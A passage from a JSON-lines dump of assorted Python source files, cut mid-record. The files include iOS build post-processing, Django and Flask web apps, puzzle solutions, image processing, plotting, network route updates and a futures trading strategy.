= argv[4]\n\nprint('Adding Teak App Id and Api Key entries to Info.plist')\nplist_data = plistlib.readPlist(os.path.join(path, 'Info.plist'))\nplist_data[\"TeakAppId\"] = appId\nplist_data[\"TeakApiKey\"] = apiKey\n\nnew_dict = {'CFBundleTypeRole': 'Editor', 'CFBundleURLSchemes': ['teak' + appId]}\nif \"CFBundleURLTypes\" in plist_data:\n plist_data[\"CFBundleURLTypes\"].append(new_dict.copy())\nelse:\n plist_data[\"CFBundleURLTypes\"] = [new_dict]\n\nplistlib.writePlist(plist_data, os.path.join(path, 'Info.plist'))\n\nproject = XcodeProject.Load(path + '/Unity-iPhone.xcodeproj/project.pbxproj')\n\nteak_cp_path = path + '/Teak/'\nif not os.path.exists(teak_cp_path):\n os.makedirs(teak_cp_path)\n\nprint('Adding AdSupport.framework')\nproject.add_file_if_doesnt_exist('System/Library/Frameworks/AdSupport.framework', tree='SDKROOT')\nprint('Adding StoreKit.framework')\nproject.add_file_if_doesnt_exist('System/Library/Frameworks/StoreKit.framework', tree='SDKROOT')\nprint('Adding libsqlite3.tbd')\nproject.add_file_if_doesnt_exist('usr/lib/libsqlite3.tbd', tree='SDKROOT')\n\ntry:\n files_in_dir = os.listdir(fileToAddPath)\n for f in files_in_dir:\n if not f.startswith('.'): #ignore .DS_STORE\n pathname = os.path.join(fileToAddPath, f)\n fileName, fileExtension = os.path.splitext(pathname)\n if not fileExtension == '.meta': #ignore .meta as it is under asset server\n print('Adding ' + pathname + ' as ' + teak_cp_path + os.path.basename(pathname))\n if os.path.isfile(pathname):\n shutil.copy2(pathname, teak_cp_path)\n project.add_file_if_doesnt_exist(teak_cp_path + os.path.basename(pathname))\n if os.path.isdir(pathname):\n shutil.copy2(pathname, teak_cp_path)\n project.add_folder(teak_cp_path + os.path.basename(pathname), excludes=[\"^.*\\.meta$\"])\nexcept OSError as e:\n # May want to check if e is actually no such file, and re-throw if not\n pass\nfinally:\n if project.modified:\n project.backup()\n project.save()\n","sub_path":"Assets/Teak/Editor/ios_post_process.py","file_name":"ios_post_process.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"252043128","text":"from django.urls import path\n#from . import views\nfrom .views import BlogView, ArticleDetailView, AddPostView, UpdatePostView, DeletePostView, AddCategoryView, AddCommentView\n\n\nurlpatterns = [\n #path('', views.blog, name=\"blog\"),\n path('', BlogView.as_view(), name=\"BlogView\"),\n path('article/', ArticleDetailView.as_view(), name='article-detail'),\n path('add_post/', AddPostView.as_view(), name='add_post'),\n path('add_category/', AddCategoryView.as_view(), name='add_category'),\n path('article/edit/', UpdatePostView.as_view(), name='update_post'),\n path('article//delete', DeletePostView.as_view(), name='delete_post'),\n path('article//comment/', AddCommentView.as_view(), name='add_comment'),\n]\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"218387963","text":"\"\"\"\n斐波那契数据当前一项是前两项之和\n\"\"\"\n\n\nclass Solution:\n def Fibonacci(self, n):\n a, b = 0, 1\n for i in range(n):\n a, b = b, a + b\n return a\n\n\nsolution = Solution()\nresult = solution.Fibonacci(5)\nprint(result)","sub_path":"斐波那契数列.py","file_name":"斐波那契数列.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"233708560","text":"'''\n This simple script just sends two sdk commands to the camera;\n (1 ) a no-op command and a (2) getProgramAddress command.\n'''\n\n##### START BOILERPLATE ################################################\nimport serial #\nser = serial.Serial( ) #\nser.port = 'COM4' # <== adjust to local COM port #\nser.baudrate = 921600 #\nser.timeout = None #\nimport PyCam.PyCamWrapFuncs as sdk #\npci = sdk.sdkFunction #\npci.serialConn = ser #\npci.prn = 3 # Log Verbosity. # <-- 0= Silent. 3= Most Verbose. #\npci.log = '' # Log to File turned off (log to console always on).#\npci.log = 'my.log' # Log to File turned on (log to console always on).#\n# #\n# Now that the Boilerplate has run we can call any function documented in #\n# CameraCommands.xlsx by preceeding that function name with 'sdk.' #\n# #\n##### END BOILERPLATE ################################################\n\nrsp = sdk.noOp() # Send a nop. \ndata = 0x0000\nrsp = sdk.getProgramAddr(data) # Send a get programm address command.\n\n#rsp = sdk.setThreeLgTempMaps([33000,20000,15000]) prob w/ new threaded ver of pycam on dennis machine vis-a-vis glsm.\n\n","sub_path":"simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"433091154","text":"p = input()\nN = int(input())\n\nc = [input().lstrip() for i in range(N)]\ncan = []\n\nfor s in c:\n if s.endswith(p):\n can.append(s)\n\nif len(can) == 0:\n exit(print(\"Wrong fingerprints!\", end=''))\n\ncan.sort()\n\nprint(len(can))\nfor s in can[:-1]:\n print(s)\nprint(can[-1], end='')\n","sub_path":"FINGP.py","file_name":"FINGP.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"259382998","text":"from time import time\r\n\r\ndef check_validity(preamble, num_to_check): \r\n for num in preamble:\r\n if num_to_check - num in preamble: return True\r\n return False\r\n\r\n\r\nnumbers = list(map(int,open('input.txt').read().split('\\n')))\r\n\r\n# Part 1\r\nt0 = time()\r\nfor i in range(25, len(numbers)):\r\n preamble = numbers[i-25:i]\r\n num_to_check = numbers[i]\r\n\r\n if not check_validity(preamble, num_to_check): \r\n print(num_to_check,i)\r\n break\r\nprint('Part 1 time: {}s'.format(time() - t0))\r\n\r\n# Part 2\r\ntarget = 375054920\r\n\r\nflag = False\r\nfor i in range(len(numbers)-25):\r\n curr_sum = numbers[i]\r\n sum_list = [numbers[i]]\r\n j = i + 1\r\n while curr_sum < target:\r\n curr_sum += numbers[j]\r\n sum_list.append(numbers[j])\r\n if curr_sum == target:\r\n print(max(sum_list) + min(sum_list))\r\n flag = True\r\n break\r\n j += 1\r\n if flag: break","sub_path":"Day9/day_9.py","file_name":"day_9.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"230724486","text":"import cv2\nimport numpy as np \n\nx=cv2.imread(\"house.tif\")\nimg=cv2.cvtColor(x,cv2.COLOR_BGR2GRAY)\nimg=np.float32(img)\n\ndst=cv2.cornerHarris(img,2,3,0.04)\ndst=cv2.dilate(dst,None)\nx[dst>0.01*dst.max()]=[0,0,255]\n\ncv2.imshow(\"img\",x)\n#cv2.imshow(\"corner\",dst)\n\nk=cv2.waitKey(0)\nif k==27:\n\tcv2.destroyAllWindows()","sub_path":"q19.py","file_name":"q19.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"479534762","text":"# 10\ndef test():\n n = int(input())\n exponents = input().split()\n exponents = list(map(int, exponents))\n graph = [[0] * n for _ in range(0, n)]\n for _ in range(0, n - 1):\n edge = input().split()\n edge = list(map(int, edge))\n graph[edge[0] - 1][edge[1] - 1] = 1\n graph[edge[1] - 1][edge[0] - 1] = 1\n res = fix(graph, exponents)\n print(res,end='')\n\n\ndef fix(graph, exponents):\n res = [sum(exponents)]\n dfs(graph, exponents, res)\n return max(res)\n\n\ndef dfs(graph, exponents, res):\n for i in range(0, len(graph)):\n for j in range(i, len(graph)):\n if graph[i][j] == 1:\n graph[i][j] = 0\n graph[j][i] = 0\n graphs = []\n unions = []\n getUnions(graphs, graph, unions)\n exponents0 = []\n for k in unions[0]:\n exponents0.append(exponents[k])\n exponents1 = []\n for k in unions[1]:\n exponents1.append(exponents[k])\n if sum(exponents0) > sum(exponents1):\n res.append(sum(exponents0))\n dfs(graphs[0], exponents0, res)\n elif sum(exponents0) < sum(exponents1):\n res.append(sum(exponents1))\n dfs(graphs[1], exponents1, res)\n else:\n res.append(sum(exponents0))\n dfs(graphs[0], exponents0, res)\n dfs(graphs[1], exponents1, res)\n graph[i][j] = 1\n graph[j][i] = 1\n\n\ndef getUnions(graphs, graph, unions):\n for i in range(0, len(graph)):\n union = [i]\n for j in range(0, len(graph)):\n if graph[i][j] == 1:\n union.append(j)\n if not unions:\n unions.append(union)\n else:\n ok = False\n for k in range(0, len(unions)):\n if list(set(union).intersection(set(unions[k]))):\n unions.append(list(set(union).union(set(unions.pop(k)))))\n ok = True\n break\n if not ok:\n unions.append(union)\n getFinalUnions(unions)\n for union in unions:\n g = [[0] * len(union) for _ in range(0, len(union))]\n ind = 0\n for i in union:\n oud = 0\n for j in union:\n if graph[i][j] == 1:\n g[ind][oud] = graph[i][j]\n oud = oud + 1\n ind = ind + 1\n graphs.append(g)\n","sub_path":"Code/CodeRecords/2455/60698/306813.py","file_name":"306813.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"272329613","text":"from pylab import *\n\npart = '2.1'\n\ntest_acc1 = loadtxt('../training_data/test_accuracy_part'+part+'.txt')\ntrain_acc1 = loadtxt('../training_data/train_accuracy_part'+part+'.txt')\ntest_loss1 = loadtxt('../training_data/test_loss_part'+part+'.txt')\ntrain_loss1 = loadtxt('../training_data/train_loss_part'+part+'.txt')\n\npart = '2.2'\n\ntest_acc2 = loadtxt('../training_data/test_accuracy_part'+part+'.txt')\ntrain_acc2 = loadtxt('../training_data/train_accuracy_part'+part+'.txt')\ntest_loss2 = loadtxt('../training_data/test_loss_part'+part+'.txt')\ntrain_loss2 = loadtxt('../training_data/train_loss_part'+part+'.txt')\n\nsvm_acc = loadtxt('../training_data/test_accuracy_svm.txt')\n\nrcParams['font.family'] = 'serif'\nrcParams['font.sans-serif'] = ['times']\nrcParams['font.size'] = 7\nf = figure(figsize=(5.55, 2.3))\nf.patch.set_facecolor('white')\n\nsubplot(131)\nloglog(train_loss1, 'r', linestyle='dotted')\nloglog(train_loss2, 'b', linestyle='dotted')\nl1, = loglog(test_loss1, 'r')\nl2, = loglog(test_loss2, 'b')\ngca().spines['right'].set_visible(False)\ngca().spines['top'].set_visible(False)\ngca().yaxis.set_ticks_position('left')\ngca().xaxis.set_ticks_position('bottom')\nxlim(1,200)\nxlabel('Epoch (minibatch 200)')\nylabel('Loss')\nlegend([l1, l2], ['softmax', 'CNN'],\n loc=3, frameon=False, fontsize='7')\ngca().annotate('(a)', xy=(0.017, 0.95),\n xycoords='figure fraction', fontsize='8')\n\nsubplot(132)\nsemilogx(train_acc1, 'r', linestyle='dotted')\nsemilogx(train_acc2, 'b', linestyle='dotted')\nl1, = semilogx(test_acc1, 'r')\nl2, = semilogx(test_acc2, 'b')\ngca().spines['right'].set_visible(False)\ngca().spines['top'].set_visible(False)\ngca().yaxis.set_ticks_position('left')\ngca().xaxis.set_ticks_position('bottom')\nxlim(1,200)\nxlabel('Epoch (minibatch 200)')\nylabel('Accuracy')\nlegend([l1, l2], ['softmax', 'CNN'],\n loc=4, frameon=False, fontsize='7')\ngca().annotate('(b)', xy=(0.35, 0.95),\n xycoords='figure fraction', fontsize='8')\n\nsubplot(133)\nsemilogx(svm_acc)\nsemilogx([1, 40], [1.0, 1.0], 'b', linestyle='dotted')\nylim(0.1,1)\nxlim(1,200)\ngca().spines['right'].set_visible(False)\ngca().spines['top'].set_visible(False)\ngca().yaxis.set_ticks_position('left')\ngca().xaxis.set_ticks_position('bottom')\nxlabel('Train set size (200)')\nylabel('Accuracy')\ngca().annotate('(c)', xy=(0.676, 0.95),\n xycoords='figure fraction', fontsize='8')\n\ntight_layout()\nsavefig('Fig2.pdf')","sub_path":"figures/plot_Fig2.py","file_name":"plot_Fig2.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"459012297","text":"from visualTree import *\nfrom myNode import *\n\nprintTree_level(deserialize('{2,1,3,0,7,9,1,2,#,1,0,#,#,8,8,#,#,#,#,7}'))\n\ndef recoverTree(root):\n change = []\n minval = -(1<<31)\n maxval = (1<<31)-1\n BST(root, minval, maxval, change)\n if change:\n if len(change) == 2:\n change[0][1].val = change[1][1].val\n elif len(change) == 1:\n change[0][0].val = change[0][1].val\n\ndef BST(root, minval, maxval, change):\n if not root:\n return\n if root.left:\n if root.left.val < root.val :\n change.append([root, left])\n BST(root.left, minval, root.val-1, change)\n if root.right:\n if root.val > root.right.val:\n change.append([root, right])\n BST(root.right, root.val+1, maxval, change)\n\ndef recoverTree1(root):\n res, \n\n","sub_path":"RecoverBinarySearchTree.py","file_name":"RecoverBinarySearchTree.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"511838772","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3351)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/local/lib/python3.5/dist-packages/netana/bldmat.py\n# Compiled at: 2014-06-13 19:28:46\n# Size of source mod 2**32: 902 bytes\n\n\ndef bldmat(nbrow=2, nbcol=2, obj='0'):\n \"\"\"Build matrix of obj's nbrows by nbcols.\n Call: bldmat(nbrow=2,nbcol=2,obj='0')\n Returns: Matrix (list of lists) of obj.\"\"\"\n res = []\n for row in range(nbrow):\n temp = []\n for col in range(nbcol):\n temp.append(obj)\n\n if nbrow == 1:\n return temp\n res.append(temp)\n\n return res\n\n\nif __name__ == '__main__':\n mat = bldmat(10, 10)\n print('10X10 \"0\" matrix')\n print('{}'.format(mat))\n mat = bldmat(1, 10)\n print('1X10 \"0\" matrix')\n print('{}'.format(mat))\n mat = bldmat(3, 3, 'A')\n print('3X3 \"A\" matrix')\n print('{}'.format(mat))\n mat[0][0] = 'B'\n print('{}'.format(mat))","sub_path":"pycfiles/netana-3.1.18.linux-x86_64.tar/bldmat.cpython-35.py","file_name":"bldmat.cpython-35.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"538959538","text":"from flask import Flask,render_template,request,session,redirect,url_for\nfrom application import app,db\nfrom application.models.randevu_model import Randevu\nfrom application.models.kullanici_model import Kullanici\nfrom datetime import datetime\nfrom flask_mail import Mail, Message\n\n\napp.config['MAIL_SERVER']='smtp.gmail.com'\napp.config['MAIL_PORT'] = 465\napp.config['MAIL_USERNAME'] = 'furkanece99@gmail.com'\napp.config['MAIL_PASSWORD'] = ''\napp.config['MAIL_USE_TLS'] = False\napp.config['MAIL_USE_SSL'] = True\n\nmail = Mail(app)\n\n\n@app.route(\"/randevu\", methods=['GET'])\ndef randevu():\n formatted_randevular = {}\n for key in range(0, 24):\n if key < 10:\n formatted_randevular['0{}:00'.format(key)] = 0\n else:\n formatted_randevular['{}:00'.format(key)] = 0\n today_date = datetime.now()\n change_date = today_date.strftime(\"%Y-%m-%d\")\n randevular = Randevu.query.filter_by(tarih = change_date, saha=1).all()\n for randevu in randevular:\n formatted_randevular[randevu.saat] = randevu.aktif_randevu\n return render_template(\"randevu.html\", randevu = formatted_randevular, tarih = change_date, saha=\"1\")\n\n@app.route(\"/randevu//\", methods=['GET'])\ndef randevuye_git(saha, tarih):\n today_date = datetime.now()\n change_date = today_date.strftime(\"%Y-%m-%d\")\n if tarih < change_date:\n tarih = change_date\n formatted_randevular = {}\n for key in range(0, 24):\n if key < 10:\n formatted_randevular['0{}:00'.format(key)] = 0\n else:\n formatted_randevular['{}:00'.format(key)] = 0\n randevular = Randevu.query.filter_by(tarih = tarih, saha=int(saha)).all()\n for randevu in randevular:\n formatted_randevular[randevu.saat] = randevu.aktif_randevu\n return render_template(\"randevu.html\", randevu = formatted_randevular, tarih = tarih, saha=saha)\n\n\n@app.route('/randevu/kaydet', methods=['POST'])\ndef kaydet():\n user_id = session[\"user_id\"]\n tarih = request.form['tarih']\n saat = request.form['saat']\n saha = request.form['saha']\n email = session[\"email\"]\n gonder = Kullanici.query.filter_by(email = email).first()\n print(gonder)\n randevu = Randevu(saat = saat, tarih=tarih, kullanici_id = user_id, saha = int(saha))\n print(randevu)\n db.session.add(randevu)\n db.session.commit()\n msg = Message('Randevunuz Oluşturulmuştur', sender = 'furkanece99@gmail.com', recipients = [gonder.email])\n msg.body = \"Saat \"+ randevu.saat +\"'ya \"+ str(randevu.saha) +\" numaralı saha için randevunuz oluşturulmuştur iyi eğlenceler.\"\n mail.send(msg)\n print(msg)\n return redirect(url_for(\"profile\"))\n \n \n\n\n@app.route('/randevu/sil/')\ndef sil(id):\n email = session[\"email\"]\n gonder = Kullanici.query.filter_by(email = email).first()\n randevu = Randevu.query.get(id)\n db.session.delete(randevu)\n db.session.commit()\n msg = Message('Randevunuz İptal Edilmiştir', sender = 'furkanece99@gmail.com', recipients = [gonder.email])\n msg.body = \"Saat \"+ randevu.saat +\"'ya \"+ str(randevu.saha) +\" numaralı saha için alınan randevunuz iptal edilmiştir.\"\n mail.send(msg)\n print(msg)\n return redirect(url_for(\"profile\")) \n\n \n\n\n ","sub_path":"application/randevu.py","file_name":"randevu.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"27105916","text":"# -*- encoding: utf-8\n\nimport pytest\n\nfeedvalidator = pytest.importorskip('feedvalidator')\n\nfrom feedvalidator import compatibility\nfrom feedvalidator.formatter.text_plain import Formatter\n\n\ndef test_feed_is_valid_atom(hostname):\n atom_url = 'http://%s/feeds/all.atom.xml' % hostname\n try:\n events = feedvalidator.validateURL(\n atom_url, firstOccurrenceOnly=1\n )['loggedEvents']\n except feedvalidator.logging.ValidationFailure as vf:\n events = [vf.event]\n\n events = compatibility.AA(events)\n output = Formatter(events)\n print('\\n'.join(output))\n assert len(events) == 0\n","sub_path":"tests/test_atom_feed.py","file_name":"test_atom_feed.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"169655321","text":"from internetInfo import get_ivi_address\nfrom netaddr.ip import IPNetwork\nimport subprocess\nimport urllib\nimport urllib2\n\n\ndef set_second_ivi_route(target_address, target_via, iface_name):\n # first find out if the target is with in the next hop\n target_via_prefix = str(IPNetwork(target_via + '/64').network)\n my_next_hop_addr = get_ivi_address(iface_name)\n my_next_prefix = str(IPNetwork(my_next_hop_addr).network)\n\n # get target_via addr's gateway\n target_via_gateway = str(IPNetwork(target_via + '/64').network)\n router_address = subprocess.Popen('sudo ip -6 route | grep ' + target_via_prefix, shell=True,\n stdout=subprocess.PIPE)\n router_address = router_address.communicate()[0].split(' ')[2]\n\n # add the needed route table on this machine\n subprocess.Popen('sudo ip -6 route del ' + target_address, shell=True)\n subprocess.Popen('sudo ip -6 route add ' + target_address + ' via ' + router_address + ' dev ' + iface_name, shell=True)\n\n if my_next_prefix != target_via_prefix:\n # we need to tell the next hop machine what to do!\n return tell_next_machine(70, target_address, target_via)\n else:\n return 'success'\n\n\ndef tell_next_machine(port_num, target_address, target_via):\n try:\n target_via_prefix = str(IPNetwork(target_via + '/64').network)\n router_address = subprocess.Popen('sudo ip -6 route | grep ' + target_via_prefix, shell=True,\n stdout=subprocess.PIPE)\n router_address = router_address.communicate()[0].split(' ')[2]\n # send the url request (http post request)\n data = {'target_address': target_address}\n data['target_via'] = target_via\n data_urlencode = urllib.urlencode(data)\n\n requrl = 'http://[' + router_address + ']:' + str(port_num) + '/update_route/'\n req = urllib2.Request(url=requrl, data=data_urlencode)\n res_data = urllib2.urlopen(req)\n return res_data.read()\n except:\n return 'Error loading data' + requrl\n finally:\n print('this Heart beat stopped')\n","sub_path":"priClient/priClient/utils/change_route_table.py","file_name":"change_route_table.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"231017180","text":"#!/usr/bin/env python\n#coding: utf8\n#Author: Felix\n#E-mail: chengfeng56@qq.com\n#Function: 购物车优化版\n\nproduct_list =[\n ['Mi 5s',1999],\n ['HaWei Mate8',2799],\n ['IPhone 6s plus',6888],\n ['ThinkPad T460P',7888],\n ['MacBook Air 13',6988],\n ['MacBook Pro 13',9288],\n]\n\nshopping_list = [] # 定义空列表\nsalary = input(\"Input your salary:\") # 输入工资\nif salary.isdigit(): # 判断是不是数字\n salary = int(salary) # 是数字转换成 int\n while True: # 进入循环\n for index,item in enumerate(product_list): # 建立商品索引给列表加下标\n print(index,item) # 打印索引及商品列表\n #break\n '''方法2 enumerate 取列表下标\n for item in shopping_list:\n print(shopping_list.index(item),item)\n break\n '''\n user_choice = input(\"选择要购买的商品:\") # 选择购买商品\n if user_choice.isdigit(): # 判断用户输入数字类型\n user_choice = int(user_choice) # 转换成int类型\n if user_choice < len(product_list) and user_choice >=0: # 判断用户输入是否在范围内\n p_itme =product_list[user_choice] # 通过下标,添加购买商品列表\n if p_itme[1] <= salary: # 判断工资是否够用\n shopping_list.append(p_itme) # 添加到已购买商品列表\n salary -= p_itme[1] # 扣除费用\n print(\"Added %s into shopping cart,your current balance is \\033[31;1m%s\\033[0m\" %(p_itme,salary)) # 显示已购买的商品和费用\n else:\n print(\"\\033[41;1m你的余额只剩[%s]了,买不起了。\\033[0m\" % salary) # 显示余额\n else:\n print(\"product code [%s] is not exist!\" % user_choice) # 提示商品不存在\n elif user_choice == 'q': # 输入 q 退出\n print('----------shopping list----------') # 打印购买商品\n for p in shopping_list:\n print(p) # 打印商品\n print(\"Your current balance:\",salary) # 显示余额\n exit()\n else:\n print(\"invalid option\")","sub_path":"01.python3-base/day2/04.购物车优化版.py","file_name":"04.购物车优化版.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"150854966","text":"import numpy as np\n\nimport measurements.util.data\nimport measurements.constants\n\nimport util.logging\nlogger = util.logging.logger\n\n\ndef same_box_sample_correlations(all_values, lsm):\n ## calculate all and seasonal variances\n all_values.categorize_indices_to_lsm(lsm, discard_year=False)\n seasonal_values = all_values.means(min_values=measurements.constants.MEAN_MIN_MEASUREMENTS, return_type='measurements')\n seasonal_values.discard_year()\n seasonal_variances = seasonal_values.variances(min_values=measurements.constants.DEVIATION_MIN_MEASUREMENTS, return_type='measurements')\n all_values.discard_year()\n all_variances = all_values.variances(min_values=measurements.constants.DEVIATION_MIN_MEASUREMENTS, return_type='measurements')\n \n ## calculate same box correlations\n same_box_correlations = measurements.util.data.Measurements()\n for key in seasonal_variances.keys():\n seasonal_list = seasonal_variances[key]\n assert len(seasonal_list) == 1\n seasonal_variance = seasonal_list[0]\n all_list = all_variances[key]\n assert len(all_list) == 1\n all_variance = all_list[0]\n if all_variance > 0:\n correlation = seasonal_variance / all_variance\n correlation = min(correlation, measurements.constants.CORRELATION_MAX_ABS_VALUE)\n same_box_correlations.append_value(key, correlation)\n \n return same_box_correlations\n","sub_path":"measurements/util/correlation.py","file_name":"correlation.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"246973497","text":"\nfrom django.urls import path\n\n#\n#\nfrom apps.core.views import register, reg\n\nfrom apps.articles.views import add_article_page, admin_dashboard, delArtsAdmin, delete_cat, edit_article_admin, edit_article_page, deleteArticle\n\n#admin url imports\nfrom apps.articles.views import admin_dashboard, manage_articles, add_articles_admin, deleteArticleAdmin,manage_categories, add_cat, delete_cat, edit_cat, delArtsAdmin, edit_admin_prof\n\n#accounts\nfrom apps.articles.views import manage_account\n\n\nfrom .views import myaccount,edit_profile, accept_invitation\nurlpatterns = [\n path('', accept_invitation, name='accept_invitation'),\n path('edit_profile/', edit_profile, name='edit_profile'),\n path('reg/', reg, name='reg'),\n path('register/', register, name='register'),\n path('myaccount/', myaccount, name='myaccount'),\n \n \n #User article paths\n path('add_article/', add_article_page, name='add_article'),\n path('edit_article//', edit_article_page, name='edit_art'),\n path('delete_article//', deleteArticle, name='del_art'),\n \n #ADMIN URLS\n path('admin_dashboard/',admin_dashboard, name='admin_dashboard'), #for dashboard\n \n path('manage_articles/',manage_articles, name='manage_articles'), #to manage articles\n path('add_articles_admin/',add_articles_admin, name='add_articles_admin'), #add an article\n path('edit_article_admin//', edit_article_admin, name='edit_art_admin'), #edit an article\n path('edit_article_admin//', edit_article_admin, name='edit_art_admin'), #edit an article\n path('delete_article_admin//', deleteArticleAdmin, name='del_art_admin'), #delete an article\n path('delete_articles_admin/',delArtsAdmin, name='del_arts'), #add an article\n \n \n path('manage_categories/',manage_categories, name='manage_categories'), #manage categories\n path('add_category/', add_cat, name='add_cat'),\n path('add_category//', add_cat, name='add_cat'),\n path('edit_category/', edit_cat, name='edit_cat'), #\n path('delete_category//', delete_cat, name='del_cat'), #\n path('manage_account/', manage_account, name='manage_account'), #\n path('edit_prof/', edit_admin_prof, name='edit_prof'), #\n \n \n]\n","sub_path":"apps/userprofile/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"6059231","text":"from database import *\nimport hashlib\nimport requests\nimport time\n\nloop_time = 60\n\ndef make_url(account):\n userid = hashlib.md5(account.url.encode('utf-8')).hexdigest()\n return 'http://%s/secrets/%s' % (account.url, userid)\n\ndef make_flag(account):\n userid = hashlib.md5(account.url.encode('utf-8')).hexdigest()\n return \"FLAG_%s\" % userid\n\ndef has_flag(account):\n response = requests.get(make_url(account))\n return response.status_code == 200 and \\\n make_flag(account) in str(response.content)\n\ndef put_flag(account):\n url = make_url(account)\n flag = make_flag(account)\n response = requests.post(url, data={'note': flag})\n response.raise_for_status()\n print('uploaded flag: %s for url: %s' % (flag, url))\n\n\n\nif __name__ == '__main__':\n while True:\n\n start_time = time.time()\n\n try:\n for account in Account.select():\n print(account.url, \" \", end=\"\")\n\n try:\n is_up = has_flag(account)\n\n if not is_up:\n put_flag(account)\n is_up = has_flag(account)\n\n except:\n is_up = False\n\n account.is_up = is_up\n\n if is_up:\n account.points += 10\n\n account.save()\n print(\"UP\" if is_up else \"DOWN\")\n\n\n elapsed = time.time() - start_time\n time.sleep(loop_time - elapsed)\n\n except KeyboardInterrupt:\n break\n","sub_path":"chart/verifier.py","file_name":"verifier.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"123417323","text":"# -*- coding: utf-8 -*-\n# AlgoPlus量化投资开源框架范例\n# 微信公众号:AlgoPlus\n# 项目地址:http://gitee.com/AlgoPlus/AlgoPlus\n# 项目网址:http://www.algo.plus\n# 项目网址:http://www.ctp.plus\n# 项目网址:http://www.7jia.com\n\n\nfrom time import sleep\nfrom multiprocessing import Process, Queue\nfrom profit_loss_manager_base import ProfitLossManagerBase\nfrom tick_engine import TickEngine\n\n\nclass MyProfitLossManager(ProfitLossManagerBase):\n def __init__(self, td_server, broker_id, investor_id, password, app_id, auth_code, md_queue=None\n , page_dir='', private_resume_type=2, public_resume_type=2):\n\n super(MyProfitLossManager, self).__init__(td_server, broker_id, investor_id, password, app_id, auth_code, md_queue\n , page_dir, private_resume_type, public_resume_type)\n\n self.trading_schedule = []\n self.anchor_time_list = []\n self.server_time_dict = {}\n\n # 初始化参数\n self.init_parameter()\n\n # 等待子线程结束\n self.Join()\n\n # ############################################################################# #\n def init_parameter(self):\n \"\"\"\n 初始化策略参数\n :return:\n \"\"\"\n parameter_dict = self.md_queue.get(block=False) # 策略参数结构体\n self.pl_parameter_dict = parameter_dict[b\"ProfitLossParameterDict\"]\n self.order_ref = parameter_dict[b\"ID\"] * 10000\n self.order_ref_range = [self.order_ref, self.order_ref + 10000]\n self.trading_schedule = parameter_dict[b\"TradingScheduleDict\"]\n\n self.anchor_time_list = parameter_dict[b\"AnchorTimeList\"]\n for instrument_id in self.trading_schedule.keys():\n if instrument_id not in self.instrument_id_registered:\n self.instrument_id_registered.append(instrument_id)\n\n self._write_log(f\"策略参数初始化完成!ID=>{parameter_dict[b'ID']}\")\n\n def is_my_order(self, order_ref):\n \"\"\"\n 以OrderRef标识本策略订单。\n \"\"\"\n return order_ref.isdigit() and self.order_ref_range[0] < int(order_ref) < self.order_ref_range[1]\n\n def update_time_trigger(self, server_time, instrument_id):\n \"\"\"\n 如果触发时间条��则发出开仓委托。\n :param server_time: 服务器时间列表。server_time[0]表示最新时间,server_time[1]表示前一刻的时间\n :param instrument_id: 合约\n :return:\n \"\"\"\n for anchor_time in self.anchor_time_list:\n if server_time[1] < anchor_time <= server_time[0]:\n self.order_ref += 1\n exchange_id = self.trading_schedule[instrument_id][b\"ExchangeID\"]\n volume = self.trading_schedule[instrument_id][b\"Volume\"]\n direction = self.trading_schedule[instrument_id][b\"Direction\"]\n order_price = self.get_default_price(instrument_id, direction)\n self.req_order_insert(exchange_id, instrument_id, order_price, volume, self.order_ref, direction, b\"0\")\n self._write_log(f\"服务器时间{server_time[0]}触发{anchor_time}{'买' if direction == b'0' else '卖'}开仓{instrument_id},价格:{order_price},手数:{volume}\")\n\n # ############################################################################# #\n def Join(self):\n while True:\n if self.status == 0:\n self.process_rtn_trade()\n\n while not self.md_queue.empty():\n last_md = self.md_queue.get(block=False)\n instrument_id = last_md[\"InstrumentID\"]\n if instrument_id in self.instrument_id_registered:\n if instrument_id not in self.server_time_dict.keys():\n 